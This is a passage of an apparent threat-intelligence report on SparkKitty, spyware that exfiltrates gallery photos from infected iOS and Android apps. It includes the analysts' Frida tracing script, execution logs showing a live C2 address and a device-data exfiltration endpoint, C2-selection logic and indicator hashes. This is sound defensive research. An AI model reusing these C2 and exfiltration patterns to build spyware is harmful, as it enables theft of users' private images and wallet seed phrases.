  931. <div id="attachment_116802" style="width: 692px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116802" class="size-full wp-image-116802" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png" alt="Uploading image and device information" width="682" height="622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png 682w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-300x274.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-384x350.png 384w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-307x280.png 307w" sizes="auto, (max-width: 682px) 100vw, 682px" /></a><p id="caption-attachment-116802" class="wp-caption-text">Uploading image and device information</p></div>
  932. <p>Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:</p>
  933. <ol>
  934. <li>The C2 address storage was located in both the module&#8217;s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.</li>
  935. </ol>
  936. <div id="attachment_116803" style="width: 885px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116803" class="size-full wp-image-116803" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png" alt="Procedure for obtaining C2 addresses" width="875" height="670" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png 875w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-300x230.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-768x588.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-457x350.png 457w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-740x567.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-366x280.png 366w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-800x613.png 800w" sizes="auto, (max-width: 875px) 100vw, 875px" /></a><p id="caption-attachment-116803" class="wp-caption-text">Procedure for obtaining C2 addresses</p></div>
  937. <ol start="2">
  938. <li>Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.</li>
  939. </ol>
  940. <div id="attachment_116804" style="width: 665px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116804" class="size-full wp-image-116804" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png" alt="Finding the shortest response time" width="655" height="494" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-300x226.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-200x150.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-464x350.png 464w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-371x280.png 371w" sizes="auto, (max-width: 655px) 100vw, 655px" /></a><p id="caption-attachment-116804" class="wp-caption-text">Finding the shortest response time</p></div>
  941. <ol start="3">
  942. <li>The code uses custom names for classes, methods, and fields.</li>
  943. <li>It is written in Kotlin. Other versions we found were written in Java.</li>
  944. </ol>
  945. <h2 id="spyware-in-official-app-stores">Spyware in official app stores</h2>
  946. <p>One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it, and they removed the app from the store.</p>
  947. <div id="attachment_116805" style="width: 1497px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116805" class="size-full wp-image-116805" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png" alt="Infected app on Google Play" width="1487" height="1072" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png 1487w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-300x216.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-1024x738.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-768x554.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-485x350.png 485w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-740x533.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-388x280.png 388w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-800x577.png 800w" sizes="auto, (max-width: 1487px) 100vw, 1487px" /></a><p id="caption-attachment-116805" class="wp-caption-text">Infected app on Google Play</p></div>
  948. <p>Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.</p>
  949. <div id="attachment_116806" style="width: 1946px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116806" class="size-full wp-image-116806" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png" alt="Infected app page on the App Store" width="1936" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png 1936w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-284x300.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-968x1024.png 968w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-768x812.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-1452x1536.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-331x350.png 331w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-740x783.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-265x280.png 265w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-800x846.png 800w" sizes="auto, (max-width: 1936px) 100vw, 1936px" /></a><p id="caption-attachment-116806" class="wp-caption-text">Infected app page on the App Store</p></div>
  950. <p>In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central <code>AppDelegate</code> class, which manages the app&#8217;s lifecycle, registers its selector <code>[AppDelegate requestSuccess:]</code> as a handler for responses returned by requests sent to <strong>i.bicoin[.]com[.]cn</strong>.</p>
  951. <div id="attachment_116807" style="width: 1339px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116807" class="size-full wp-image-116807" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png" alt="Checking the server response and sending a photo" width="1329" height="596" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12.png 1329w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-1024x459.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-768x344.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-780x350.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-740x332.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-624x280.png 624w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003800/sparkkitty-ios12-800x359.png 800w" sizes="auto, (max-width: 1329px) 100vw, 1329px" /></a><p id="caption-attachment-116807" class="wp-caption-text">Checking the server response and sending a photo</p></div>
  952. <pre class="urvanov-syntax-highlighter-plain-tag">{
  953.    code = 0;
  954.    data =     {
  955.        27 =         (
  956.        );
  957.        50002 =         (
  958.                        {
  959.                appVersion = "";
  960.                cTime = 1696304011000;
  961.                id = 491;
  962.                imgSubTitle = "";
  963.                imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
  964.                imgType = 50002;
  965.                imgUrl = 0;
  966.                imgUrlSub = "";
  967.                isFullScreen = 0;
  968.                isNeed = 1;
  969.                isSkip = 1;
  970.                langType = all;
  971.                operator = 0;
  972.                skipUrl = "";
  973.                sort = 10000;
  974.                source = 0;
  975.                type = 0;
  976.                uTime = &lt;timestamp&gt;;
  977.            }
  978.        );
  979.    };
  980.    dialog =     {
  981.        cancelAndClose = 0;
  982.        cancelBtn = "";
  983.        cancelColor = "";
  984.        code = 0;
  985.        confirmBtn = "";
  986.        confirmColor = "";
  987.        content = "";
  988.        contentColor = "";
  989.        time = "";
  990.        title = OK;
  991.        titleColor = "";
  992.        type = 3;
  993.        url = "";
  994.    };</pre>
  995. <center><strong><em>Sample server response</em></strong></center></p>
  996. <p>In the response, the <code>imgUrl</code> field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it&#8217;ll hit the first address on the list. If that one&#8217;s down, the malware just moves on to the next. The photo-sending functionality is implemented within the <code>KYDeviceActionManager</code> class.</p>
  997. <div id="attachment_116808" style="width: 1482px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116808" class="size-full wp-image-116808" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png" alt="Retrieving and sending photos" width="1472" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13.png 1472w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-216x300.png 216w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-736x1024.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-768x1069.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-1104x1536.png 1104w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-252x350.png 252w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-719x1000.png 719w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-201x280.png 201w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004046/sparkkitty-ios13-647x900.png 647w" sizes="auto, (max-width: 1472px) 100vw, 1472px" /></a><p id="caption-attachment-116808" class="wp-caption-text">Retrieving and sending photos</p></div>
  998. <h2 id="suspicious-libcrypto-dylib-mod">Suspicious libcrypto.dylib mod</h2>
  999. <p>During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL&#8217;s cryptographic primitives library, libcrypto.dylib. It showed up under names like <strong>wc.dylib</strong> and <strong>libswiftDarwin.dylib</strong>, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we&#8217;d seen before in other malicious frameworks. It also imported the <code>PHPhotoLibrary</code> class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious <strong>AFNetworking.framework/Alamofire.framework</strong>, sometimes not.</p>
  1000. <p>Unlike other variants of this malware, this particular library didn&#8217;t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash <strong>c5be3ae482d25c6537e08c888a742832</strong>, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an <strong>NSString</strong> object.</p>
  1001. <div id="attachment_116809" style="width: 602px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116809" class="size-full wp-image-116809" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png" alt="Section of obfuscated code for loading the malicious URL" width="592" height="293" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14.png 592w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004231/sparkkitty-ios14-566x280.png 566w" sizes="auto, (max-width: 592px) 100vw, 592px" /></a><p id="caption-attachment-116809" class="wp-caption-text">Section of obfuscated code for loading the malicious URL</p></div>
  1002. <p>Using <strong>Frida</strong>, we can execute any piece of code as a function, but simply converting a string to an <strong>NSString</strong> object isn&#8217;t enough to confirm the library&#8217;s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a <strong>GET</strong> request to the malicious URL. However, we couldn&#8217;t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the <code>objc_msgSend</code> call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:</p><pre class="urvanov-syntax-highlighter-plain-tag">function traceModule(impl, name)
  1003. {
  1004.    console.log("Tracing " + name, impl);
  1005.    var exit_log = 0;
  1006.    Interceptor.attach(impl, {
  1007.        onEnter: function(args) {
  1008.            var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
  1009.            if (!moduleMap) {
  1010.                moduleMap = new ModuleMap();
  1011.            }
  1012.            var modules = bt.map(x =&gt; moduleMap.find(x)).filter(x =&gt; x != null).map(x =&gt; x.name);
  1013.            // we want to trace only calls originating from malware dylib
  1014.            if (modules.filter(x =&gt; x.includes('wc.dylib')).length &gt; 0) {
  1015.                exit_log = 1;
  1016.                console.warn("\n*** entering " + name);
  1017.                if(name.includes('objc_msgSend')) {
  1018.                    var sel = this.context.x1.readUtf8String();
  1019.                    if (sel.includes("stringWithCString:")) {
  1020.                        var s = this.context.x2.readUtf8String();
  1021.                        if (s.includes('.cn-bj.ufileos.com')) {
  1022.                            console.log("Replacing URL: ", s);
  1023.                            var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
  1024.                            this.context.x2 = news;
  1025.                            console.log("New URL: ", this.context.x2.readUtf8String());
  1026.                        }
  1027.                        else
  1028.                            console.log(s);
  1029.                    }
  1030.                }
  1031.  
  1032.                //print backtrace
  1033.                console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
  1034.            }
  1035.          
  1036.        },
  1037.        onLeave: function(retval) {
  1038.            if (exit_log == 1) {
  1039.                console.warn("\n***extiting ", name);
  1040.                console.log(this.context.x0.readByteArray(64));
  1041.            }
  1042.        }
  1043.    });
  1044. }
  1045.  
  1046. var malInited = false;
  1047. var malFunc;
  1048. function callMalware() {
  1049.    if (!malInited) {
  1050.        malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
  1051.        traceModule(base.add(0x821360), 'objc_msgSend');
  1052.        malInited = true;
  1053.    }
  1054.    malFunc();
  1055. }
  1056.  
  1057. var mname = "wc.dylib";
  1058. var base = Process.enumerateModules().filter(x=&gt;x.name.includes(mname))[0].base;
  1059. console.log('Base address: ', base);
  1060. callMalware();</pre><p>
  1061. Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function&#8217;s execution logs.</p><pre class="urvanov-syntax-highlighter-plain-tag">*** entering objc_msgSend
  1062. ### Creating NSString object with decrypted string
  1063. [ 0x20193a010   stringWithCString:"http://84.17.37.155:8081" encoding: ]
  1064. 0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
  1065. 0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
  1066.  
  1067. *** entering objc_msgSend
  1068. ### Creating NSString with api endpoint decrypted somewhere in code
  1069. [ 0x20193a010   stringWithCString:"%@/api/getStatus?buid=%@&amp;appname=%@&amp;userId=%@" encoding: ]
  1070. 0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
  1071. 0x102783264 wc.dylib!0x7d3264 (0x7d3264)
  1072.  
  1073. ### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
  1074.  
  1075. *** entering objc_msgSend
  1076. ### Getting server response as data object
  1077. [ 0x2022d5078   initWithData:encoding: ]
  1078. 0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
  1079. 0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
  1080.  
  1081. *** leaving objc_msgSend
  1082. ### Server response in bytes
  1083.  
  1084. 00000000  41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00  A....!..........
  1085. 00000010  2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73  .{"msg":"success
  1086. 00000020  22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a  ","code":0,"us":
  1087. 00000030  31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00  1,"status":"0"}.</pre><p>
  1088. The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP&#8217;s <strong>/api/getStatus</strong> endpoint with arguments familiar from previous samples. We also see that the server&#8217;s response contains the <code>code</code> and <code>status</code> fields we&#8217;ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven&#8217;t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn&#8217;t found any samples with an active C2 address, so we don&#8217;t know the precise response it&#8217;s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.</p>
  1089. <h2 id="another-activity-cluster">Another activity cluster?</h2>
  1090. <p>During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.</p>
  1091. <div id="attachment_116810" style="width: 877px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116810" class="size-full wp-image-116810" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png" alt="Scam platform account on YouTube" width="867" height="450" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15.png 867w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-300x156.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-768x399.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-674x350.png 674w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-740x384.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-539x280.png 539w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004616/sparkkitty-ios15-800x415.png 800w" sizes="auto, (max-width: 867px) 100vw, 867px" /></a><p id="caption-attachment-116810" class="wp-caption-text">Scam platform account on YouTube</p></div>
  1092. <p>Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.</p>
  1093. <div id="attachment_116811" style="width: 1253px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116811" class="size-full wp-image-116811" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png" alt="App download links" width="1243" height="993" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16.png 1243w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-300x240.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-1024x818.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-768x614.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-438x350.png 438w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-740x591.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-350x280.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23004847/sparkkitty-ios16-800x639.png 800w" sizes="auto, (max-width: 1243px) 100vw, 1243px" /></a><p id="caption-attachment-116811" class="wp-caption-text">App download links</p></div>
  1094. <p>Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for <a href="https://developers.google.com/android/reference/com/google/mlkit/vision/text/Text.TextBlock" target="_blank" rel="noopener">text blocks</a> and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers&#8217; server – its address was retrieved from Amazon AWS storage.</p>
  1095. <div id="attachment_116812" style="width: 999px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116812" class="size-full wp-image-116812" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png" alt="Code snippet for photo uploads" width="989" height="788" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17.png 989w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-300x239.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-768x612.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-439x350.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-740x590.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-351x280.png 351w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23005056/sparkkitty-ios17-800x637.png 800w" sizes="auto, (max-width: 989px) 100vw, 989px" /></a><p id="caption-attachment-116812" class="wp-caption-text">Code snippet for photo uploads</p></div>
  1096. <p>We&#8217;re moderately confident that this activity cluster is connected to the one described above. Here&#8217;s why:</p>
  1097. <ol>
  1098. <li>The malicious apps also focus on cryptocurrency themes.</li>
  1099. <li>Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.</li>
  1100. <li>The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.</li>
  1101. </ol>
  1102. <p>Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.</p>
  1103. <h2 id="campaign-goals-and-targets">Campaign goals and targets</h2>
  1104. <p>Unlike SparkCat, the spyware we analyzed above doesn&#8217;t show direct signs of the attackers being interested in victims&#8217; crypto assets. However, we still believe they&#8217;re stealing photos with that exact goal in mind. The following details lead us to these conclusions:</p>
  1105. <ol>
  1106. <li>A crypto-only store was embedded within the TikTok app alongside the spyware.</li>
  1107. <li>Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.</li>
  1108. <li>The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and <a href="https://en.wikipedia.org/wiki/Progressive_web_app" target="_blank" rel="noopener">PWAs (progressive web apps)</a>. Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.</li>
  1109. </ol>
  1110. <p>Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.<br />
  1111. Furthermore, we believe this malware is linked to the SparkCat campaign, and here&#8217;s our reasoning:</p>
  1112. <ul>
  1113. <li>Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.</li>
  1114. <li>In both campaigns, we found the same infected Android apps.</li>
  1115. <li>Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers&#8217; systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.</li>
  1116. </ul>
  1117. <h2 id="takeaways">Takeaways</h2>
  1118. <p>Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn&#8217;t picky about which photos it steals from the gallery. Although we suspect the attackers&#8217; main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.</p>
  1119. <p>Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn&#8217;t have any technical limitations that would prevent it from attacking users in other regions.</p>
  1120. <p>Our security products return the following verdicts when detecting malware associated with this campaign:</p>
  1121. <ul>
  1122. <li>HEUR:Trojan-Spy.AndroidOS.SparkKitty.*</li>
  1123. <li>HEUR:Trojan-Spy.IphoneOS.SparkKitty.*</li>
  1124. </ul>
  1125. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1126. <h3 id="infected-android-apps">Infected Android apps</h3>
  1127. <p><a href="https://opentip.kaspersky.com/b4489cb4fac743246f29abf7f605dd15/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a07819f134a140f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b4489cb4fac743246f29abf7f605dd15</a><br />
  1128. <a href="https://opentip.kaspersky.com/e8b60bf5af2d5cc5c501b87d04b8a6c2/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______97a60829f3003c98&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e8b60bf5af2d5cc5c501b87d04b8a6c2</a><br />
  1129. <a href="https://opentip.kaspersky.com/aa5ce6fed4f9d888cbf8d6d8d0cda07f/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______86e257b3ff5cb4d3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">aa5ce6fed4f9d888cbf8d6d8d0cda07f</a><br />
